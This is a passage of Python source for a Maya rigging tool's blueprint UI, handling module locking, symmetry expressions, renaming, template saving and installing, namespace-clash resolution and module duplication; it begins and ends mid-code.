moduleInstance.Install()\n \n # After installation of module, select module transform with move tool\n moduleTranform = \"%s__%s:module_transform\" %(mod.CLASS_NAME, userSpecName)\n pm.select(moduleTranform, replace = True)\n pm.setToolTo(\"moveSuperContext\")\n \n \n def IsRootTransformInstalled(self):\n pm.namespace(setNamespace = \":\")\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n for namespace in namespaces:\n if namespace.find(\"RootTransform__\") == 0:\n return True\n \n return False\n \n def LockBlueprint(self, *args):\n \n # Recommend creation of root transform if not already implemented\n if not self.IsRootTransformInstalled():\n result = pm.confirmDialog(messageAlign = \"center\", title = \"Lock Blueprints\", message = \"We have detected that you don't have a root transform (global transform). \\nWould you like to go back and edit your blueprint setup? \\n\\n(It is recommended that all rigs have at least one global control module).\", button = [\"Yes\", \"No\"], defaultButton = \"Yes\", dismissString = \"Yes\")\n \n if result == \"Yes\":\n return\n \n \n # Give user warning that locking is permanent\n result = pm.confirmDialog(messageAlign = 'center', title = 'Lock Blueprints', button = ['Accept', 'Cancel'], defaultButton = 'Accept', cancelButton = 'Cancel', dismissString = 'Cancel', message = \"The action of locking a character will convert the current blueprint modules to joints. \\nThis action cannot be undone. \\nModifications to the blueprint system cannot be made after this point. \\n\\nDo you wish to continue?\")\n \n if result != 'Accept':\n return\n \n # Clear scene of script jobs\n self.DeleteSymmetryMoveExpressions()\n pm.checkBox(self.UIElements[\"symmetryMoveCheckBox\"], edit = True, value = False)\n self.DeleteScriptJob()\n \n \n moduleInfo = [] # Store (module, userSpecifiedName) pairs\n \n # List all namespaces in scene from root\n pm.namespace(setNamespace = ':')\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n moduleNameInfo = utils.FindAllModuleNames(\"/Modules/Blueprint\")\n validModules = moduleNameInfo[0]\n validModuleNames = moduleNameInfo[1]\n \n # Search scene for valid namespaces\n for n in namespaces:\n splitString = n.partition('__')\n \n if splitString[1] != '':\n \n module = splitString[0]\n userSpecifiedName = splitString[2]\n \n # Add valid modules\n if module in validModuleNames:\n index = validModuleNames.index(module)\n moduleInfo.append([validModules[index], userSpecifiedName])\n \n \n # Abort locking if no blueprints available\n if len(moduleInfo) == 0:\n pm.confirmDialog(messageAlign = 'center', title = 'Lock Blueprints', message = \"There appear to be no blueprint \\ninstances in the current scene. \\n\\nAborting lock.\", button = [\"Accept\"], defaultButton = \"Accept\")\n return\n \n \n # Lock phase 1\n moduleInstances = []\n for module in moduleInfo:\n mod = __import__(\"Blueprint.%s\" %module[0], {}, {}, [module[0]])\n reload(mod)\n \n moduleClass = getattr(mod, mod.CLASS_NAME)\n moduleInst = moduleClass(module[1], None)\n \n moduleInf = moduleInst.Lock_phase1()\n moduleInstances.append((moduleInst, moduleInf))\n \n \n # Lock phase 2\n for module in moduleInstances:\n module[0].Lock_phase2(module[1])\n \n \n # Lock phase 3\n for module in moduleInstances:\n hookObject = module[1][4]\n module[0].Lock_phase3(hookObject)\n \n \n # Blueprints completely locked\n sceneLockedLocator = pm.spaceLocator(name = \"Blueprints_Locked\")\n pm.setAttr(\"%s.visibility\" %sceneLockedLocator, 0)\n pm.lockNode(sceneLockedLocator, lock = True, lockUnpublished = True)\n \n # Force update scene\n pm.select(clear = True)\n self.ModifySelected()\n \n pm.tabLayout(self.UIElements[\"tabs\"], edit = True, selectTabIndex = 3)\n pm.columnLayout(self.UIElements[\"moduleColumn\"], edit = True, enable = False)\n pm.columnLayout(self.UIElements[\"templatesColumn\"], edit = True, enable = False)\n pm.iconTextButton(self.UIElements[\"lockBlueprintsBtn\"], edit = True, enable = False)\n pm.iconTextButton(self.UIElements[\"lockControlsBtn\"], edit = True, enable = True)\n pm.iconTextButton(self.UIElements[\"publishBtn\"], edit = True, enable = False)\n \n \n def LockControls(self, *args):\n \n # Controls completely locked\n sceneLockedLocator = pm.spaceLocator(name = \"Controls_Locked\")\n pm.setAttr(\"%s.visibility\" %sceneLockedLocator, 0)\n pm.lockNode(sceneLockedLocator, lock = True, lockUnpublished = True)\n \n # Force update scene\n pm.select(clear = True)\n self.ModifySelected()\n \n pm.tabLayout(self.UIElements[\"tabs\"], edit = True, selectTabIndex = 1)\n pm.tabLayout(self.UIElements[\"tabs\"], edit = True, enable = False)\n pm.iconTextButton(self.UIElements[\"lockBlueprintsBtn\"], edit = True, enable = False)\n pm.iconTextButton(self.UIElements[\"lockControlsBtn\"], edit = True, enable = False)\n pm.iconTextButton(self.UIElements[\"publishBtn\"], edit = True, enable = True)\n \n \n def ModifySelected(self, *args):\n \n # Only proceed if the scene haven't been locked down\n if not pm.objExists(\"Blueprints_Locked\"):\n \n if pm.checkBox(self.UIElements[\"symmetryMoveCheckBox\"], query = True, value = True):\n self.DeleteSymmetryMoveExpressions()\n self.SetupSymmetryMoveExpressions()\n \n \n selectedNodes = pm.ls(selection = True)\n \n if len(selectedNodes) <= 1:\n self.moduleInstance = None\n selectedModuleNamespace = None\n currentModuleFile = None\n \n pm.button(self.UIElements[\"ungroupBtn\"], edit = True, enable = False)\n pm.button(self.UIElements[\"mirrorModuleBtn\"], edit = True, enable = False)\n \n if len(selectedNodes) == 1:\n lastSelected = selectedNodes[0]\n \n # Enable ungroup button if selected node is a group node\n if lastSelected.find(\"Group__\") == 0:\n pm.button(self.UIElements[\"ungroupBtn\"], edit = True, enable = True)\n pm.button(self.UIElements[\"mirrorModuleBtn\"], edit = True, enable = True, label = \"Mirror Group\")\n \n namespaceAndNode = utils.StripLeadingNamespace(lastSelected)\n \n if namespaceAndNode != None:\n namespace = namespaceAndNode[0]\n \n moduleNameInfo = utils.FindAllModuleNames(\"/Modules/Blueprint\")\n validModules = moduleNameInfo[0]\n validModuleNames = moduleNameInfo[1]\n \n index = 0\n for moduleName in validModuleNames:\n moduleNameIncSuffix = \"%s__\" %moduleName\n \n if namespace.find(moduleNameIncSuffix) == 0:\n currentModuleFile = validModules[index]\n selectedModuleNamespace = namespace\n break\n \n index += 1\n \n controlEnable = False\n userSpecifiedName = ''\n constrainCommand = self.ConstrainRootToHook\n constrainLabel = \"Constrain Root > Hook\"\n \n if selectedModuleNamespace != None:\n controlEnable = True\n userSpecifiedName = selectedModuleNamespace.partition('__')[2]\n \n \n mod = __import__(\"Blueprint.%s\" %currentModuleFile, {}, {}, [currentModuleFile])\n reload(mod)\n \n moduleClass = getattr(mod, mod.CLASS_NAME)\n self.moduleInstance = moduleClass(userSpecifiedName, None)\n \n \n pm.button(self.UIElements[\"mirrorModuleBtn\"], edit = True, enable = True, label = \"Mirror Module\")\n \n if self.moduleInstance.IsRootConstrained():\n constrainCommand = self.UnconstrainRootFromHook\n constrainLabel = \"Unconstrain Root\"\n \n \n pm.button(self.UIElements[\"rehookBtn\"], edit = True, enable = controlEnable)\n pm.button(self.UIElements[\"snapRootBtn\"], edit = True, enable = controlEnable)\n pm.button(self.UIElements[\"constrainBtn\"], edit = True, enable = controlEnable, label = constrainLabel, command = constrainCommand)\n \n pm.button(self.UIElements[\"deleteModuleBtn\"], edit = True, enable = controlEnable, command = self.DeleteModule)\n \n pm.textField(self.UIElements[\"moduleName\"], edit = True, enable = controlEnable, text = userSpecifiedName)\n \n \n self.CreateModuleSpecificControls()\n \n \n self.CreateScriptJob()\n \n \n \n def CreateModuleSpecificControls(self):\n \n existingControls = pm.columnLayout(self.UIElements[\"moduleSpecific_column\"], query = True, childArray = True)\n \n if existingControls != None:\n pm.deleteUI(existingControls)\n \n pm.setParent(self.UIElements[\"moduleSpecific_column\"])\n \n if self.moduleInstance != None:\n self.moduleInstance.UI(self, self.UIElements[\"moduleSpecific_column\"])\n \n \n def DeleteModule(self, *args):\n symmetryMove = pm.checkBox(self.UIElements[\"symmetryMoveCheckBox\"], query = True, value = True)\n if symmetryMove:\n self.DeleteSymmetryMoveExpressions()\n \n self.moduleInstance.Delete()\n pm.select(clear = True)\n \n if symmetryMove:\n self.SetupSymmetryMoveExpressions_CheckBox()\n \n \n def RenameModule(self, *args):\n newName = pm.textField(self.UIElements[\"moduleName\"], query = True, text = True)\n \n symmetryMove = pm.checkBox(self.UIElements[\"symmetryMoveCheckBox\"], query = True, value = True)\n if symmetryMove:\n self.DeleteSymmetryMoveExpressions()\n \n self.moduleInstance.RenameModuleInstance(newName)\n \n if symmetryMove:\n self.SetupSymmetryMoveExpressions_CheckBox()\n \n previousSelected = pm.ls(selection = True)\n \n if len(previousSelected) > 0:\n pm.select(previousSelected, replace = True)\n \n else:\n pm.select(clear = True)\n \n \n \n def FindHookObjectFromSelection(self, *args):\n \n selectedObjects = pm.ls(selection = True, transforms = True)\n numberOfObjects = len(selectedObjects)\n hookObj = None\n \n if numberOfObjects != 0:\n hookObj = selectedObjects[numberOfObjects - 1]\n \n return hookObj\n \n \n \n def RehookModule_setup(self, *args):\n \n selectedNodes = pm.ls(selection = True, transforms = True)\n \n if len(selectedNodes) == 2:\n newHook = self.FindHookObjectFromSelection()\n self.moduleInstance.Rehook(newHook)\n \n else:\n self.DeleteScriptJob()\n \n currentSelection = pm.ls(selection = True)\n \n pm.headsUpMessage(\"Please select the joint you wish to re-hook to. Clear selection to un-hook.\")\n \n pm.scriptJob(event = ['SelectionChanged', partial(self.RehookModule_callback, currentSelection)], runOnce = True)\n \n \n \n \n def RehookModule_callback(self, _currentSelection):\n newHook = self.FindHookObjectFromSelection()\n \n self.moduleInstance.Rehook(newHook)\n \n if len(_currentSelection) > 0:\n pm.select(_currentSelection, replace = True)\n else:\n pm.select(clear = True)\n \n \n self.CreateScriptJob()\n \n \n \n def SnapRootToHook(self, *args):\n self.moduleInstance.SnapRootToHook()\n \n \n def ConstrainRootToHook(self, *args):\n self.moduleInstance.ConstrainRootToHook()\n \n pm.button(self.UIElements[\"constrainBtn\"], edit = True, label = \"Unconstrain Root\", command = self.UnconstrainRootFromHook)\n \n \n def UnconstrainRootFromHook(self, *args):\n self.moduleInstance.UnconstrainRootFromHook()\n \n pm.button(self.UIElements[\"constrainBtn\"], edit = True, label = \"Constrain Root > Hook\", command = self.ConstrainRootToHook)\n \n \n def GroupSelected(self, *args):\n import System.groupSelected as group\n reload(group)\n \n group.GroupSelected().ShowUI()\n \n \n def UngroupSelected(self, *args):\n import System.groupSelected as group\n reload(group)\n \n group.UngroupSelected()\n \n \n \n def MirrorModule(self, *args):\n \n import System.mirrorModule as mirror\n reload(mirror)\n \n mirror.MirrorModule()\n \n \n def SetupSymmetryMoveExpressions_CheckBox(self, *args):\n self.DeleteScriptJob()\n \n self.SetupSymmetryMoveExpressions()\n \n self.CreateScriptJob()\n \n \n \n def SetupSymmetryMoveExpressions(self, *args):\n pm.namespace(setNamespace = \":\")\n selection = pm.ls(selection = True, transforms = True)\n \n expressionContainer = pm.container(name = \"symmetryMove_container\")\n \n if len(selection) == 0:\n return\n \n linkedObjs = []\n for obj in selection:\n if obj in linkedObjs:\n continue\n \n # Apply symmetry to group\n if obj.find(\"Group__\") == 0:\n if pm.attributeQuery(\"mirrorLinks\", node = obj, exists = True):\n mirrorLinks = pm.getAttr(\"%s.mirrorLinks\" %obj)\n groupInfo = mirrorLinks.rpartition(\"__\")\n mirrorObj = groupInfo[0]\n axis = groupInfo[2]\n \n linkedObjs.append(mirrorObj)\n \n self.SetupSymmetryMoveForObject(obj, mirrorObj, axis, _translation = True, _orientation = True, _globalScale = True)\n \n else:\n objNamespaceInfo = utils.StripLeadingNamespace(obj)\n \n if objNamespaceInfo != None:\n if pm.attributeQuery(\"mirrorLinks\", node = \"%s:module_grp\" %objNamespaceInfo[0], exists = True):\n mirrorLinks = pm.getAttr(\"%s:module_grp.mirrorLinks\" %objNamespaceInfo[0])\n \n moduleInfo = mirrorLinks.rpartition(\"__\")\n module = moduleInfo[0]\n axis = moduleInfo[2]\n \n # Apply symmetry to translation control\n if objNamespaceInfo[1].find(\"translation_control\") != -1:\n mirrorObj = \"%s:%s\" %(module, objNamespaceInfo[1])\n linkedObjs.append(mirrorObj)\n self.SetupSymmetryMoveForObject(obj, mirrorObj, axis, _translation = True, _orientation = False, _globalScale = False)\n \n # Apply symmetry to module transform\n elif objNamespaceInfo[1].find(\"module_transform\") == 0:\n mirrorObj = \"%s:module_transform\" %module\n linkedObjs.append(mirrorObj)\n self.SetupSymmetryMoveForObject(obj, mirrorObj, axis, _translation = True, _orientation = True, _globalScale = True)\n \n # Apply symmetry to rotation control\n elif objNamespaceInfo[1].find(\"orientation_control\") != -1:\n mirrorObj = \"%s:%s\" %(module, objNamespaceInfo[1])\n linkedObjs.append(mirrorObj)\n \n expressionString = \"%s.rotateX = %s.rotateX;\\n\" %(mirrorObj, obj)\n expression = pm.expression(name = \"%s_symmetryMoveExpression\" %mirrorObj, string = expressionString)\n utils.AddNodeToContainer(expressionContainer, expression)\n \n # Apply symmetry to single orientation control\n elif objNamespaceInfo[1].find(\"singleJointOrientation_control\") != -1:\n mirrorObj = \"%s:%s\" %(module, objNamespaceInfo[1])\n linkedObjs.append(mirrorObj)\n \n expressionString = \"%s.rotateX = %s.rotateX;\\n\" %(mirrorObj, obj)\n expressionString += \"%s.rotateY = %s.rotateY;\\n\" %(mirrorObj, obj)\n expressionString += \"%s.rotateZ = %s.rotateZ;\\n\" %(mirrorObj, obj)\n \n expression = pm.expression(name = \"%s_symmetryMoveExpression\" %mirrorObj, string = expressionString)\n utils.AddNodeToContainer(expressionContainer, expression)\n \n pm.lockNode(expressionContainer, lock = True)\n pm.select(selection, replace = True)\n \n \n \n def SetupSymmetryMoveForObject(self, _obj, _mirrorObj, _axis, _translation = False, _orientation = False, _globalScale = False):\n \n duplicateObject = pm.duplicate(_obj, parentOnly = True, inputConnections = True, name = \"%s_mirrorHelper\" %_obj)[0]\n \n emptyGroup = pm.group(empty = True, name = \"%smirror_scale_grp\" %_obj)\n pm.parent(duplicateObject, emptyGroup, absolute = True)\n \n scaleAttribute = \".scale%s\" %_axis\n pm.setAttr(\"%s%s\" %(emptyGroup, scaleAttribute), -1)\n \n # mel expression 'namespace -setNamespace \":\";' causes update errors post Maya 2010\n expressionString = ''\n if _translation:\n expressionString += '$worldSpacePos = `xform -query -worldSpace -translation %s`;\\n' %_obj\n if _orientation:\n expressionString += '$worldSpaceOrient = `xform -query -worldSpace -rotation %s`;\\n' %_obj\n \n \n attrs = []\n if _translation:\n attrs.extend([\".translateX\", \".translateY\", \".translateZ\"])\n if _orientation:\n attrs.extend([\".rotateX\", \".rotateY\", \".rotateZ\"])\n \n \n # Force an update of the expression\n for attr in attrs:\n expressionString += \"%s%s = %s%s;\\n\" %(duplicateObject, attr, _obj, attr)\n \n \n i = 0\n for axis in [\"X\", \"Y\", \"Z\"]:\n if _translation:\n expressionString += \"%s.translate%s = $worldSpacePos[%d];\\n\" %(duplicateObject, axis, i)\n if _orientation:\n expressionString += \"%s.rotate%s = $worldSpaceOrient[%d];\\n\" %(duplicateObject, axis, i)\n \n i += 1\n \n \n if _globalScale:\n expressionString += \"%s.globalScale = %s.globalScale;\\n\" %(duplicateObject, _obj)\n \n # Create unique expression name from namespace\n expressionNames = utils.StripLeadingNamespace(duplicateObject)\n expName = ''\n \n if expressionNames == None:\n expName = '%s' %duplicateObject\n else:\n expName = \"%s__%s\" %(expressionNames[0], expressionNames[1])\n \n expression = pm.expression(name = \"%s__symmetryMoveExpression\" %expName, string = expressionString)\n \n \n constraint = ''\n if _translation and _orientation:\n constraint = pm.parentConstraint(duplicateObject, _mirrorObj, maintainOffset = False, name = \"%s_symmetryMoveConstraint\" %_mirrorObj)\n elif _translation:\n constraint = pm.pointConstraint(duplicateObject, _mirrorObj, maintainOffset = False, name = \"%s_symmetryMoveConstraint\" %_mirrorObj)\n elif _orientation:\n constraint = pm.orientConstraint(duplicateObject, _mirrorObj, maintainOffset = False, name = \"%s_symmetryMoveConstraint\" %_mirrorObj)\n \n if _globalScale:\n pm.connectAttr(\"%s.globalScale\" %duplicateObject, \"%s.globalScale\" %_mirrorObj)\n \n \n utils.AddNodeToContainer(\"symmetryMove_container\", [duplicateObject, emptyGroup, expression, constraint], True)\n \n \n def DeleteSymmetryMoveExpressions(self, *args):\n container = \"symmetryMove_container\"\n \n if pm.objExists(container):\n pm.lockNode(container, lock = False)\n \n nodes = pm.container(container, query = True, nodeList = True)\n nodes = pm.ls(nodes, type = [\"parentConstraint\", \"pointConstraint\", \"orientConstraint\"])\n \n if len(nodes) > 0:\n pm.delete(nodes)\n \n pm.delete(container)\n \n \n def PrepareForTemplate(self, *args):\n \n pm.select(all = True)\n rootLevelNodes = pm.ls(selection = True, transforms = True)\n \n filteredNodes = []\n for node in rootLevelNodes:\n \n if node.find(\"Group__\") == 0:\n filteredNodes.append(node)\n else:\n nodeNamespaceInfo = utils.StripAllNamespaces(node)\n \n if nodeNamespaceInfo != None:\n if nodeNamespaceInfo[1] == \"module_transform\":\n filteredNodes.append(node)\n \n \n pm.select(filteredNodes, replace = True)\n self.GroupSelected()\n \n \n def SaveCurrentAsTemplate(self, *args):\n \n self.saveTemplateUIElements = {}\n \n if pm.window(\"saveTemplate_UI_window\", exists = True):\n pm.deleteUI(\"saveTemplate_UI_window\")\n \n windowWidth = 300\n windowHeight = 152\n self.saveTemplateUIElements[\"window\"] = pm.window(\"saveTemplate_UI_window\", width = windowWidth, height = windowHeight, title = \"Save Current as Template\", sizeable = False)\n \n self.saveTemplateUIElements[\"topLevelColumn\"] = pm.columnLayout(adjustableColumn = True, columnAlign = \"center\", rowSpacing = 3, parent = self.saveTemplateUIElements[\"window\"])\n self.saveTemplateUIElements[\"templateName_rowColumn\"] = pm.rowColumnLayout(numberOfColumns = 2, columnAttach = (1, 'right', 0), columnWidth = [(1, 90), (2, windowWidth - 100)], parent = self.saveTemplateUIElements[\"topLevelColumn\"])\n \n pm.text(label = \"Template Name: \", parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n self.saveTemplateUIElements[\"templateName\"] = pm.textField(text = '([a-z][A-Z][0-9] and _ only)', parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n \n pm.text(label = \"Title: \", parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n self.saveTemplateUIElements[\"templateTitle\"] = pm.textField(text = 'Title', parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n \n pm.text(label = \"Description: \", parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n self.saveTemplateUIElements[\"templateDescription\"] = pm.textField(text = 'Description', parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n \n pm.text(label = \"Icon: \", parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n self.saveTemplateUIElements[\"templateIcon\"] = pm.textField(text = '[programRoot]/Icons/_icon.xpm', parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n \n \n pm.separator(style = \"in\", parent = self.saveTemplateUIElements[\"topLevelColumn\"])\n \n columnWidth = (windowWidth / 2) - 5\n self.saveTemplateUIElements[\"button_row\"] = pm.rowLayout(numberOfColumns = 2, columnWidth = [(1, columnWidth), (2, columnWidth)], columnAttach = [(1, \"both\", 10), (2, \"both\", 10)], columnAlign = [(1, \"center\"), (2, \"center\")], parent = self.saveTemplateUIElements[\"topLevelColumn\"])\n \n pm.button(label = \"Accept\", command = self.SaveCurrentAsTemplate_AcceptWindow, parent = self.saveTemplateUIElements[\"button_row\"])\n pm.button(label = \"Cancel\", command = self.SaveCurrentAsTemplate_CancelWindow, parent = self.saveTemplateUIElements[\"button_row\"])\n \n pm.showWindow(self.saveTemplateUIElements[\"window\"])\n \n \n def SaveCurrentAsTemplate_CancelWindow(self, *args):\n pm.deleteUI(self.saveTemplateUIElements[\"window\"])\n \n \n def SaveCurrentAsTemplate_AcceptWindow(self, *args):\n templateName = pm.textField(self.saveTemplateUIElements[\"templateName\"], query = True, text = True)\n \n #programRoot = self.directory\n programRoot = os.environ[\"RIGGING_TOOL_ROOT\"]\n templateFileName = \"%s/Templates/%s.ma\" %(programRoot, templateName)\n \n if os.path.exists(templateFileName):\n pm.confirmDialog(title = \"Save Current as Template\", message = \"Template already exists with that name. Aborting save.\", button = [\"Accept\"], defaultButton = \"Accept\")\n return\n \n if pm.objExists(\"Group_container\"):\n pm.select(\"Group_container\", replace = True)\n else:\n pm.select(clear = True)\n \n pm.namespace(setNamespace = \":\")\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n for n in namespaces:\n if n.find(\"__\") != -1:\n pm.select(\"%s:module_container\" %n, add = True)\n \n pm.exportSelected(templateFileName, type = \"mayaAscii\")\n pm.select(clear = True)\n \n title = pm.textField(self.saveTemplateUIElements[\"templateTitle\"], query = True, text = True)\n description = pm.textField(self.saveTemplateUIElements[\"templateDescription\"], query = True, text = True)\n icon = pm.textField(self.saveTemplateUIElements[\"templateIcon\"], query = True, text = True)\n \n \n if icon.find(\"[programRoot]\") != -1:\n icon = \"%s%s\" %(programRoot, icon.partition(\"[programRoot]\")[2])\n \n \n templateDescriptionFileName = \"%s/Templates/%s.txt\" %(programRoot, templateName)\n with open(templateDescriptionFileName, 'w') as file:\n \n file.write(\"%s\\n\" %title)\n file.write(\"%s\\n\" %description)\n file.write(\"%s\\n\" %icon)\n \n \n self.CreateTemplateInstallButton(templateFileName)\n pm.showWindow(self.UIElements[\"window\"])\n \n pm.deleteUI(self.saveTemplateUIElements[\"window\"])\n \n \n \n def InstallTemplate(self, _templateAndPath, *args):\n pm.importFile(_templateAndPath, namespace = \"TEMPLATE_1\")\n \n self.ResolveNamespaceClashes(\"TEMPLATE_1\")\n \n groupContainer = \"TEMPLATE_1:group_container\"\n if pm.objExists(groupContainer):\n self.ResolveGroupNameClashes(\"TEMPLATE_1\")\n \n pm.lockNode(groupContainer, lock = False, lockUnpublished = False)\n \n oldGroupContainer = \"Group_container\"\n if pm.objExists(oldGroupContainer):\n pm.lockNode(oldGroupContainer, lock = False, lockUnpublished = False)\n \n nodeList = pm.containe(groupContainer, query = True, nodeList = True)\n utils.AddNodeToContainer(oldGroupContainer, nodeList, _force = True)\n \n pm.delete(groupContainer)\n else:\n pm.rename(groupContainer, oldGroupContainer)\n \n pm.lockNode(\"Group_container\", lock = True, lockUnpublished = True)\n \n # Clean up temporary namespace\n pm.namespace(setNamespace = \":\")\n pm.namespace(moveNamespace = (\"TEMPLATE_1\", \":\"), force = True)\n pm.namespace(removeNamespace = \"TEMPLATE_1\")\n \n \n def ResolveNamespaceClashes(self, _tempNamespace):\n returnNames = []\n \n pm.namespace(setNamespace = _tempNamespace)\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n pm.namespace(setNamespace = \":\")\n existingNamespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n \n for i in range(len(namespaces)):\n namespaces[i] = namespaces[i].partition(\"%s:\" %_tempNamespace)[2]\n \n for name in namespaces:\n newName = str(name)\n oldName = \"%s:%s\" %(_tempNamespace, name)\n \n if name in existingNamespaces:\n highestSuffix = utils.FindHighestTrailingNumber(existingNamespaces, \"%s_\" %name)\n highestSuffix += 1\n \n newName = \"%s_%d\" %(name, highestSuffix)\n \n returnNames.append([oldName, newName])\n \n \n self.ResolveNameChangeMirrorLinks(returnNames, _tempNamespace)\n \n \n self.RenameNamespaces(returnNames)\n \n return returnNames\n \n \n def ResolveGroupNameClashes(self, _tempNamespace):\n pm.namespace(setNamespace = _tempNamespace)\n dependencyNodes = pm.namespaceInfo(listOnlyDependencyNodes = True)\n \n pm.namespace(setNamespace = \":\")\n \n transforms = pm.ls(dependencyNodes, transforms = True)\n \n groups = []\n for node in transforms:\n if node.find(\"%s:Group__\"% _tempNamespace) == 0:\n groups.append(node)\n \n if len(groups) == 0:\n return groups\n \n groupNames = []\n for group in groups:\n groupName = group.partition(\"%s:\" %_tempNamespace)[2]\n newGroupName = str(groupName)\n \n if pm.objExists(newGroupName):\n existingGroups = pm.ls(\"Group__*\", transforms = True)\n \n highestSuffix = utils.FindHighestTrailingNumber(existingGroups, \"%s_\" %groupName)\n highestSuffix += 1\n \n newGroupName = \"%s_%d\" %(groupName, highestSuffix)\n \n groupNames.append([group, newGroupName])\n \n \n self.ResolveNameChangeMirrorLinks(groupNames, _tempNamespace)\n \n groupContainer = \"%s:Group_container\" %_tempNamespace\n if pm.objExists(groupContainer):\n pm.lockNode(groupContainer, lock = False, lockUnpublished = False)\n \n for name in groupNames:\n pm.rename(name[0], name[1])\n \n if pm.objExists(groupContainer):\n pm.lockNode(groupContainer, lock = True, lockUnpublished = True)\n \n \n return groupNames\n \n \n \n def RenameNamespaces(self, _names):\n \n for name in _names:\n oldName = name[0]\n newName = name[1]\n \n pm.namespace(setNamespace = \":\")\n pm.namespace(add = newName)\n pm.namespace(moveNamespace = [oldName, newName])\n pm.namespace(removeNamespace = oldName)\n \n \n def ResolveNameChangeMirrorLinks(self, _names, _tempNamespace):\n \n moduleNamespaces = False\n firstOldNode = _names[0][0]\n \n if utils.StripLeadingNamespace(firstOldNode)[1].find(\"Group__\") == -1:\n moduleNamespaces = True\n \n for n in _names:\n oldNode = n[0]\n \n if moduleNamespaces:\n oldNode += \":module_grp\"\n \n if pm.attributeQuery(\"mirrorLinks\", node = oldNode, exists = True):\n mirrorLink = pm.getAttr(\"%s.mirrorLinks\" %oldNode)\n mirrorLinkInfo = mirrorLink.rpartition(\"__\")\n\n mirrorNode = mirrorLinkInfo[0]\n mirrorAxis = mirrorLinkInfo[2]\n \n found = False\n container = \"\"\n \n if moduleNamespaces:\n oldNodeNamespace = n[0]\n container = \"%s:module_container\" %oldNodeNamespace\n else:\n container = \"%s:Group_container\" %_tempNamespace\n \n for nm in _names:\n oldLink = nm[0].partition(\"%s:\" %_tempNamespace)[2]\n \n if oldLink == mirrorNode:\n newLink = nm[1]\n \n if pm.objExists(container):\n pm.lockNode(container, lock = False, lockUnpublished = False)\n \n pm.setAttr(\"%s.mirrorLinks\" %oldNode, \"%s__%s\" %(newLink, mirrorAxis), type = \"string\")\n \n if pm.objExists(container):\n pm.lockNode(container, lock = True, lockUnpublished = True)\n \n found = True\n break\n \n if not found:\n if pm.objExists(container):\n pm.lockNode(container, lock = False, lockUnpublished = False)\n \n pm.deleteAttr(oldNode, attribute = \"mirrorLinks\")\n \n if pm.objExists(container):\n pm.lockNode(container, lock = True, lockUnpublished = True)\n \n \n def DuplicateModule(self, *args):\n \n modules = set([])\n groups = set([])\n \n selection = pm.ls(selection = True, transforms = True)\n \n if len(selection) == 0:\n return\n \n for node in selection:\n selectionNamespaceInfo = utils.StripLeadingNamespace(node)\n \n if selectionNamespaceInfo != None:\n if selectionNamespaceInfo[0].find(\"__\") != -1:\n modules.add(selectionNamespaceInfo[0])\n \n else:\n if node.find(\"Group__\") == 0:\n groups.add(node)\n \n \n for group in groups:\n moduleInfo = self.DuplicateModule_processGroup(group)\n \n for module in moduleInfo:\n modules.add(module)\n \n \n if len(groups) > 0:\n groupSelection = list(groups)\n pm.select(groupSelection, replace = True)\n \n else:\n pm.select(clear = True)\n \n \n for module in modules:\n pm.select(\"%s:module_container\" %module, add = True)\n \n \n if len(groups) > 0:\n pm.lockNode(\"Group_container\", lock = False, lockUnpublished = True)\n \n elif len(modules) == 0:\n return\n \n \n #duplicateFileName = \"%s/__duplicateCache.ma\" %self.directory\n duplicateFileName = \"%s/__duplicateCache.ma\" %os.environ[\"RIGGING_TOOL_ROOT\"]\n pm.exportSelected(duplicateFileName, type = \"mayaAscii\", force = True)\n \n if len(groups) > 0:\n pm.lockNode(\"Group_container\", lock = True, lockUnpublished = True)\n \n \n self.InstallDuplicate(duplicateFileName, selection)\n \n pm.setToolTo(\"moveSuperContext\")\n \n \n def InstallDuplicate(self, _duplicatePath, _selection, *args):\n pm.importFile(_duplicatePath, namespace = \"TEMPLATE_1\")\n \n moduleNames = self.ResolveNamespaceClashes(\"TEMPLATE_1\")\n groupNames = self.ResolveGroupNameClashes(\"TEMPLATE_1\")\n \n groups = []\n for name in groupNames:\n groups.append(name[1])\n \n if len(groups) > 0:\n sceneGroupContainer = \"Group_container\"\n pm.lockNode(sceneGroupContainer, lock = False, lockUnpublished = False)\n \n utils.AddNodeToContainer(sceneGroupContainer, groups, _includeShapes = True, _force = True)\n \n for group in groups:\n groupNiceName = group.partition(\"__\")[2]\n pm.container(sceneGroupContainer, edit = True, publishAndBind = [\"%s.translate\" %group, \"%s_t\" %groupNiceName])\n pm.container(sceneGroupContainer, edit = True, publishAndBind = [\"%s.rotate\" %group, \"%s_r\" %groupNiceName])\n pm.container(sceneGroupContainer, edit = True, publishAndBind = [\"%s.globalScale\" %group, \"%s_globalScale\" %groupNiceName])\n \n pm.lockNode(sceneGroupContainer, lock = True, lockUnpublished = True)\n \n pm.namespace(setNamespace = \":\")\n \n pm.namespace(moveNamespace = (\"TEMPLATE_1\", \":\"), force = True)\n pm.namespace(removeNamespace = \"TEMPLATE_1\")\n \n newSelection = []\n for node in _selection:\n found = False\n \n for group in groupNames:\n oldName = group[0].partition(\"TEMPLATE_1:\")[2]\n newName = group[1]\n \n if node == oldName:\n newSelection.append(newName)\n found = True\n break\n \n if not found:\n nodeNamespaceInfo = utils.StripLeadingNamespace(node)\n \n if nodeNamespaceInfo != None:\n nodeNamespace = nodeNamespaceInfo[0]\n nodeName = nodeNamespaceInfo[1]\n \n searchName = \"TEMPLATE_1:%s\" %nodeNamespace\n \n for module in moduleNames:\n if module[0] == searchName:\n newSelection.append(\"%s:%s\" %(module[1], nodeName))\n \n if len(newSelection) > 0:\n pm.select(newSelection, replace = True)\n \n \n \n def DuplicateModule_processGroup(self, _group):\n \n returnModules = []\n \n children = pm.listRelatives(_group, children = True, type = \"transform\")\n \n for c in children:\n selectionNamespaceInfo = utils.StripLeadingNamespace(c)\n \n if selectionNamespaceInfo != None:\n returnModules.append(selectionNamespaceInfo[0])\n \n else:\n if 